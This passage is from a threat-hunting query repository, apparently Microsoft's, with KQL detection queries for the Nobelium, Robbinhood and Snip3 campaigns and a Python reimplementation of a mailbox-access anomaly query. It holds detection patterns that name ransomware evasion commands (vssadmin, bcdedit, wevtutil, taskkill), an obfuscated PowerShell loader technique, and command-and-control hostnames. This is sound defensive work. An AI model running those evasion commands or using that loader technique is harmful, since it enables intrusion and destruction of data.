| Command and control | | |
| Exfiltration | | |
| Impact | v | Not all instances of SolarWinds Orion may be affected by Solorigate. |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/robbinhood-driver.md
================================================

# Detect loading of vulnerable drivers by Robbinhood ransomware campaign

This query was originally published in the threat analytics report, *Ransomware continues to hit healthcare, critical services*. There is also a related [blog](https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/).

[Robbinhood](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Robinhood.A&ThreatID=2147735370) is ransomware that has been involved in several high-profile incidents, including a 2019 [attack](https://www.nytimes.com/2019/05/22/us/baltimore-ransomware.html) on the city of Baltimore, Maryland.

Robbinhood operators often employ a distinctive defense evasion technique, where they load a vulnerable driver onto a target and exploit it, in order to turn off security software -- essentially using the driver as malware.

The following query detects if a device contains the vulnerable drivers. These are often, but not always, implanted on the target by operators seeking to use this technique to turn off security software.

For a query that detects a later stage of this technique, see [Detect security evasion related to the Robbinhood ransomware campaign](robbinhood-evasion.md).

## Query

```Kusto
// The two indicators are 64-character SHA256 digests, so they are compared
// against the SHA256 column.
DeviceFileEvents
| where Timestamp > ago(7d)
| where SHA256 in ('0b15b5cc64caf0c6ad9bd759eb35383b1f718edf3d7ab4cd912d0d8c1826edf8',
    '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427')
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/robbinhood-evasion.md
================================================

# Detect security evasion related to the Robbinhood ransomware campaign

This query was originally published in the threat analytics report, *Ransomware continues to hit healthcare, critical services*. There is also a related [blog](https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/).

[Robbinhood](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Robinhood.A&ThreatID=2147735370) is ransomware that has been involved in several high-profile incidents, including a 2019 [attack](https://www.nytimes.com/2019/05/22/us/baltimore-ransomware.html) on the city of Baltimore, Maryland. Robbinhood operators often employ a distinctive defense evasion technique, where they load a vulnerable driver onto a target and exploit it in order to turn off security software, essentially using the driver as malware.

The following query detects a late stage of this technique, when the operator issues commands from a cmd.exe launched under winlogon.exe (taskkill, net, vssadmin, bcdedit, wevtutil) to kill processes and services, delete volume shadow copies, tamper with the boot configuration and clear event logs. For a query that detects an earlier stage of this technique, see [Detect loading of vulnerable drivers by Robbinhood ransomware campaign](robbinhood-driver.md).
## Query

```Kusto
// RobbinHood execution and security evasion
DeviceProcessEvents
| where Timestamp > ago(7d)
// cmd.exe is not normally a child of winlogon.exe
| where InitiatingProcessFileName =~ "winlogon.exe"
// "net" is a broad term (net stop, net use, ...); tune the list if it proves noisy in your environment
| where FileName =~ "cmd.exe" and ProcessCommandLine has_any("taskkill", "net", "robbin", "vssadmin", "bcdedit", "wevtutil")
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/snip3-aviation-targeting-emails.md
================================================

# Detect keywords associated with Snip3 campaign emails

Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques.

The following query looks for keywords observed in emails involved in a Snip3-associated campaign in April and May of 2021. The emails often have an aviation theme, and the campaign primarily targets organizations involved in travel or aviation. Note that keywords may change over time.

These emails carried links hosted on legitimate hosting providers (the Google Drive and OneDrive URLs in the query) that redirected to VBScript files hosting loaders. The loaders initiate RevengeRAT or AsyncRAT downloads that eventually establish persistence on targets and exfiltrate data.
## Query

```kusto
let SubjectTerms = pack_array("Cargo Charter","Airbus Meeting","WorldWide Symposium","Airbus Family","Flight Request", "Advice from NetJets","May/ACMI","AIRCRAFT PRESENTATION","Airworthiness", "Air Quote", "RFQ #9B17811");
EmailEvents
// Match the lure terms in the subject line as well as in the sender display name
| where Subject has_any(SubjectTerms) or SenderDisplayName has_any(SubjectTerms)
// Optional sender restriction for organizations with high FP
// | where SenderIPv4 == "192.145.239.18"
| where EmailDirection == "Inbound"
| join EmailUrlInfo on $left.NetworkMessageId == $right.NetworkMessageId
| where Url has_any("drive.google.com","1drv.ms","onedrive.live.com")
| take 100
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/snip3-detectsanboxie-function-call.md
================================================

# Detect Snip3 loader call to DetectSandboxie function

Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques.

The following query looks for a function call to a method named *DetectSandboxie*. This method is used in RevengeRAT and AsyncRAT instances involved in a campaign targeting the aviation industry, first observed in 2021.
It has also been associated in the past with other malware, such as WannaCry and QuasarRAT.

Individual PowerShell functions can be detected in the same way in some instances, though care should be taken to ensure that the command name is unique; otherwise, this query may return many false positives.

## Query

```kusto
DeviceEvents
| where ActionType == "PowerShellCommand"
// AdditionalFields is a JSON blob; parse out the Command field rather than comparing the whole string,
// which stops matching as soon as another field is present
| extend Command = tostring(parse_json(AdditionalFields).Command)
| where Command =~ "DetectSandboxie"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/snip3-encoded-powershell-structure.md
================================================

# Detect Snip3 loader-encoded PowerShell command

Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques.

The following query looks for the method that Snip3 malware use to obfuscate PowerShell commands with UTF8 encoding: the payload is carried as a byte array and decoded at run time with `[Text.Encoding]::UTF8.GetString(@(...))` before being handed to `IEX`. This technique is intended to evade detection by security products, and avoids the more standard `-EncodedCommand` (Base64) switch used by malware such as Emotet.

At present, this method of encoding is much rarer, being seen largely with loader installation of RevengeRAT, AsyncRAT and other RATs used in campaigns targeting the aviation industry.

## Query

```kusto
DeviceFileEvents
| where InitiatingProcessFileName =~ "powershell.exe"
// byte array decoded with UTF8.GetString and passed to Invoke-Expression
| where InitiatingProcessCommandLine has_all ("IEX","Text.Encoding","UTF8.GetString(@")
// typical loader switches: -ExecutionPolicy Unrestricted, -WindowStyle Hidden
| where InitiatingProcessCommandLine has_any ("Unrestricted","Hidden")
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/snip3-malicious-network-connectivity.md
================================================

# Detect malicious use of RegAsm, RegSvcs, and InstallUtil by Snip3

Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques.

The following query looks for potentially hollowed processes that may be used to facilitate command-and-control or exfiltration by Snip3 malware. This technique has been used in recent cases to exfiltrate data, including credentials.

The query may return additional malware or campaigns not necessarily associated with Snip3. However, Microsoft recommends triaging all non-benign results as potential malware.
## Query

```kusto
DeviceNetworkEvents
// in~ is case-insensitive; a plain `in` would miss "regasm.exe"
| where InitiatingProcessFileName in~ ("RegSvcs.exe","RegAsm.exe","InstallUtil.exe")
// a bare, quoted image name with no arguments is the hallmark of a hollowed host process
| where InitiatingProcessCommandLine in~ ("\"RegAsm.exe\"","\"RegSvcs.exe\"","\"InstallUtil.exe\"")
| where InitiatingProcessParentFileName endswith "Powershell.exe"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | v | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/snip3-revengerat-c2-exfiltration.md
================================================

# Detect Snip3 associated communication protocols

Snip3 is a family of related remote access trojans. Although the malware in this family contain numerous small variations, they all exhibit similar behaviors and techniques.

The following query looks for network connections to command-and-control hosts associated with recent RevengeRAT, AsyncRAT, and other malware campaigns targeting the aviation industry. This activity is often followed by connections to copy-and-paste and file hosting sites such as pastebin.com, stikked.ch, academia.edu, and archive.org. Many of these connections will occur on non-standard ports.
## Query

```kusto
DeviceNetworkEvents
// hostnames must be exact, with no stray whitespace, or the match silently never fires
| where RemoteUrl in~ ("mail.alamdarhardware.com","kexa600200.ddns.net","h0pe1759.ddns.net","n0ahark2021.ddns.net","kimjoy007.dyndns.org","kimjoy.ddns.net","asin8988.ddns.net","asin8989.ddns.net","asin8990.ddns.net")
// keep RemotePort: these connections often use non-standard ports
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | v | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Collection/Anomaly of MailItemAccess by Other Users Mailbox [Nobelium].md
================================================

# Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]

This query looks for users accessing multiple other users' mailboxes, or accessing multiple folders in another user's mailbox. User-to-mailbox pairs already seen during the baseline period are treated as known good and excluded. This query is inspired by an Azure Sentinel [detection](https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/OfficeActivity/AnomolousUserAccessingOtherUsersMailbox.yaml).
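The baseline-versus-hunting-window logic that the query below encodes, run over a handful of constructed MailItemsAccessed records, as an added Python example; this is not code from the repository or from Microsoft, and the contoso.example accounts, mailbox GUIDs and IP addresses are made up. It mirrors the right-anti join against the baseline, the per-folder expansion, the IPv6 bracket stripping and the threshold reasons, and includes the boundary case of a user who touches exactly UserThreshold mailboxes, which must be reported as a folder-count exceedance:

```python
"""Baseline-vs-hunting logic of the MailItemsAccessed query, over constructed records."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

NOW = datetime(2021, 6, 1)  # fixed "now" so the constructed sample is reproducible


def client_ip(ip_address):
    """Mirror iif(IPAddress startswith "[", extract("\\[([^\\]]*)", 1, IPAddress), IPAddress):
    IPv6 clients are logged as "[addr]:port"; keep only the address."""
    m = re.match(r"\[([^\]]*)", ip_address)
    return m.group(1) if m else ip_address


def find_anomalous_mailbox_access(events, now=NOW, look_back=timedelta(days=30),
                                  time_frame=timedelta(days=14),
                                  user_threshold=1, folder_threshold=5):
    """Return one finding per UserId, like the summarize ... by UserId in the query."""
    hunt_start = now - time_frame
    baseline_pairs = set()   # (user, owner) pairs seen before the hunting window
    hunting_rows = []        # one row per folder touched inside the hunting window
    for e in events:
        if e["ActionType"] != "MailItemsAccessed" or e["ResultStatus"] != "Succeeded":
            continue
        if e["Timestamp"] <= now - look_back:
            continue
        user, owner = e["UserId"].lower(), e["MailboxOwnerUPN"].lower()
        if user == owner:    # a user's own mailbox is not interesting
            continue
        paths = [f.get("Path") for f in e.get("Folders", []) if f.get("Path")]
        if not paths:
            continue
        if e["Timestamp"] < hunt_start:
            baseline_pairs.add((user, owner))
        else:
            for path in paths:   # mv-expand Folders
                hunting_rows.append((user, owner, e["MailboxGuid"], path,
                                     e["ClientInfoString"], client_ip(e["IPAddress"])))
    # join kind=rightanti: drop hunting rows whose (user, owner) pair is known from the baseline
    per_user = defaultdict(lambda: {"folders": set(), "mailboxes": set(),
                                    "owners": set(), "clients": set(), "ips": set()})
    for user, owner, guid, path, client, ip in hunting_rows:
        if (user, owner) in baseline_pairs:
            continue
        agg = per_user[user]
        agg["folders"].add(path); agg["mailboxes"].add(guid); agg["owners"].add(owner)
        agg["clients"].add(client); agg["ips"].add(ip)
    findings = []
    for user, agg in per_user.items():
        user_count, folder_count = len(agg["mailboxes"]), len(agg["folders"])
        if not (user_count > user_threshold or folder_count > folder_threshold):
            continue
        if user_count > user_threshold and folder_count > folder_threshold:
            reason = "Both User and Folder Threshold Exceeded"
        elif folder_count > folder_threshold and user_count <= user_threshold:
            reason = "Folder Count Threshold Exceeded"  # <= : hitting the threshold is not exceeding it
        else:
            reason = "User Threshold Exceeded"
        findings.append({"UserId": user, "UserCount": user_count, "FolderCount": folder_count,
                         "Reason": reason, "MailboxOwnerUPNSet": sorted(agg["owners"]),
                         "ClientIPSet": sorted(agg["ips"])})
    return sorted(findings, key=lambda f: f["UserCount"], reverse=True)


def _ev(days_ago, user, owner, guid, paths, ip="203.0.113.10", client="Client=OWA"):
    """Build one constructed MailItemsAccessed record (not real telemetry)."""
    return {"Timestamp": NOW - timedelta(days=days_ago), "ActionType": "MailItemsAccessed",
            "ResultStatus": "Succeeded", "UserId": user, "MailboxOwnerUPN": owner,
            "MailboxGuid": guid, "Folders": [{"Path": p} for p in paths],
            "ClientInfoString": client, "IPAddress": ip}


SAMPLE_EVENTS = [
    # service account that has always read alice's mailbox: present in the baseline, so excluded
    _ev(20, "svc-backup@contoso.example", "alice@contoso.example", "g-alice", ["\\Inbox"]),
    _ev(3, "svc-backup@contoso.example", "alice@contoso.example", "g-alice", ["\\Inbox", "\\Sent Items"]),
    # alice reading her own mailbox: filtered out
    _ev(2, "alice@contoso.example", "alice@contoso.example", "g-alice", ["\\Inbox"]),
    # a user who suddenly reads two other mailboxes, from a bracketed IPv6 client address
    _ev(5, "mallory@contoso.example", "bob@contoso.example", "g-bob", ["\\Inbox"], ip="[2001:db8::1]:443"),
    _ev(4, "mallory@contoso.example", "carol@contoso.example", "g-carol", ["\\Inbox"], ip="[2001:db8::1]:443"),
    # helpdesk touching six folders of a single other mailbox (exactly UserThreshold mailboxes)
    _ev(1, "helpdesk@contoso.example", "dave@contoso.example", "g-dave",
        ["\\Inbox", "\\Sent Items", "\\Drafts", "\\Archive", "\\Deleted Items", "\\Projects"]),
]

if __name__ == "__main__":
    for finding in find_anomalous_mailbox_access(SAMPLE_EVENTS):
        print(finding)
```

With the sample above the service account never appears, mallory is reported first with two mailboxes, and helpdesk is reported for the folder count alone; a strict `<` in the folder branch would have mislabelled helpdesk as a user-threshold exceedance.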
## Query

```Kusto
// Adjust this value to exclude historical activity as known good
let LookBack = 30d;
// Adjust this value to change the hunting timeframe
let TimeFrame = 14d;
// Adjust this value to alter how many mailboxes (other than their own) a user needs to access before being included in results
let UserThreshold = 1;
// Adjust this value to alter how many folders in other users' mailboxes a user needs to access before being included in results
let FolderThreshold = 5;
let relevantMailItems = materialize (
    CloudAppEvents
    | where Timestamp > ago(LookBack)
    | where ActionType == "MailItemsAccessed"
    | where RawEventData['ResultStatus'] == "Succeeded"
    | extend UserId = tostring(RawEventData['UserId'])
    | extend MailboxOwnerUPN = tostring(RawEventData['MailboxOwnerUPN'])
    // only access to somebody else's mailbox is interesting
    | where tolower(UserId) != tolower(MailboxOwnerUPN)
    | extend Folders = RawEventData['Folders']
    | where isnotempty(Folders)
    // one row per folder touched in the event
    | mv-expand Folders
    | extend foldersPath = tostring(Folders.Path)
    | where isnotempty(foldersPath)
    | extend ClientInfoString = RawEventData['ClientInfoString']
    | extend MailBoxGuid = RawEventData['MailboxGuid']
    // IPv6 client addresses are logged as "[addr]:port"; keep only the address
    | extend ClientIP = iif(IPAddress startswith "[", extract("\\[([^\\]]*)", 1, IPAddress), IPAddress)
    | project Timestamp, ClientIP, UserId, MailboxOwnerUPN, ClientInfoString = tostring(ClientInfoString), foldersPath, MailBoxGuid = tostring(MailBoxGuid)
);
// (user, mailbox) pairs seen before the hunting window are treated as known good
let relevantMailItemsBaseLine = relevantMailItems
    | where Timestamp between(ago(LookBack) .. ago(TimeFrame))
    | distinct MailboxOwnerUPN, UserId;
let relevantMailItemsHunting = relevantMailItems
    | where Timestamp between(ago(TimeFrame) .. now())
    | distinct ClientIP, UserId, MailboxOwnerUPN, ClientInfoString, foldersPath, MailBoxGuid;
relevantMailItemsBaseLine
// rightanti keeps only hunting-window rows whose (user, mailbox) pair has no baseline match
| join kind=rightanti relevantMailItemsHunting on MailboxOwnerUPN, UserId
| summarize FolderCount = dcount(tostring(foldersPath)), UserCount = dcount(MailBoxGuid), foldersPathSet = make_set(foldersPath), ClientInfoStringSet = make_set(ClientInfoString), ClientIPSet = make_set(ClientIP), MailBoxGuidSet = make_set(MailBoxGuid), MailboxOwnerUPNSet = make_set(MailboxOwnerUPN) by UserId
| where UserCount > UserThreshold or FolderCount > FolderThreshold
| extend Reason = case(
    UserCount > UserThreshold and FolderCount > FolderThreshold, "Both User and Folder Threshold Exceeded",
    // UserCount equal to UserThreshold is not an exceedance, so this must be <=, not <
    FolderCount > FolderThreshold and UserCount <= UserThreshold, "Folder Count Threshold Exceeded",
    "User Threshold Exceeded"
)
| sort by UserCount desc
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | V | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](../Campaigns/c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](../Campaigns/compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](../Campaigns/fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](../Campaigns/fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](../Campaigns/known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](../Campaigns/launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](../Campaigns/launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](../Campaigns/locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](../Campaigns/locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](../Campaigns/possible-affected-software-orion[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)

## Contributor info

**Contributor:** Stefan Sellmer
**GitHub alias:** @stesell
**Organization:** Microsoft 365 Defender
**Contact info:** stesell@microsoft.com

================================================
FILE: Collection/HostExportingMailboxAndRemovingExport[Solarigate].md
================================================

# Host Exporting Mailbox and Removing Export

This hunting query looks for hosts exporting a mailbox from an on-prem Exchange server, followed by that same host removing the export within a short time window. Attackers have been observed using this pattern to exfiltrate email from a target environment. A mailbox export is an uncommon command to run, so look for activity from unexpected hosts and accounts.

Reference: https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/

Query inspired by Azure Sentinel detection https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/SecurityEvent/HostExportingMailboxAndRemovingExport.yaml

## Query

```Kusto
// Adjust the timeframe to change the window events need to occur within to alert.
// The join is on bin(Timestamp, timeframe), so a New/Remove pair that straddles a bin boundary
// (for example 10:59 and 11:01) is not matched; shorten or widen the bin accordingly.
let timeframe = 1h;
DeviceProcessEvents
| where FileName in~ ("powershell.exe", "cmd.exe")
| where ProcessCommandLine contains 'New-MailboxExportRequest'
| project-rename NewMailBoxExpCmd = ProcessCommandLine
| summarize by DeviceName, timekey = bin(Timestamp, timeframe), NewMailBoxExpCmd, AccountName
| join kind=inner (
    DeviceProcessEvents
    | where FileName in~ ("powershell.exe", "cmd.exe")
    | where ProcessCommandLine contains 'Remove-MailboxExportRequest'
    | project-rename RemoveMailBoxExpCmd = ProcessCommandLine
    | summarize by DeviceName, timekey = bin(Timestamp, timeframe), RemoveMailBoxExpCmd, AccountName
) on DeviceName, timekey, AccountName
| extend commands = pack_array(NewMailBoxExpCmd, RemoveMailBoxExpCmd)
| summarize by timekey, DeviceName, tostring(commands), AccountName
| project-reorder timekey, DeviceName, AccountName, ['commands']
| extend HostCustomEntity = DeviceName, AccountCustomEntity = AccountName
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | V | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Stefan Sellmer
**GitHub alias:** @stesell
**Organization:** Microsoft 365 Defender
**Contact info:** stesell@microsoft.com

================================================
FILE: Collection/MailItemsAccessedTimeSeries[Solarigate].md
================================================

# Anomalous increase in Exchange MailItemsAccessed operations

Identifies anomalous increases in Exchange mail items accessed operations. The query leverages KQL built-in anomaly detection algorithms to find large deviations from baseline patterns. Sudden increases in the execution frequency of sensitive actions should be further investigated for malicious activity. Manually raise scorethreshold from 1.5 to 3 or higher to reduce the noise from outliers flagged by the query criteria.

Read more about MailItemsAccessed: https://docs.microsoft.com/microsoft-365/compliance/advanced-audit?view=o365-worldwide#mailitemsaccessed

Query inspired by Azure Sentinel detection https://github.com/Azure/Azure-Sentinel/blob/master/Detections/OfficeActivity/MailItemsAccessedTimeSeries.yaml

## Query

```Kusto
let starttime = 14d;
let endtime = 1d;
let timeframe = 1h;
let scorethreshold = 1.5;
// Preparing the time series data: hourly count of MailItemsAccessed operations as a multi-value array to use with the time series anomaly function.
let TimeSeriesData = CloudAppEvents
    | where Timestamp between (startofday(ago(starttime))..startofday(ago(endtime)))
    | where ActionType =~ "MailItemsAccessed"
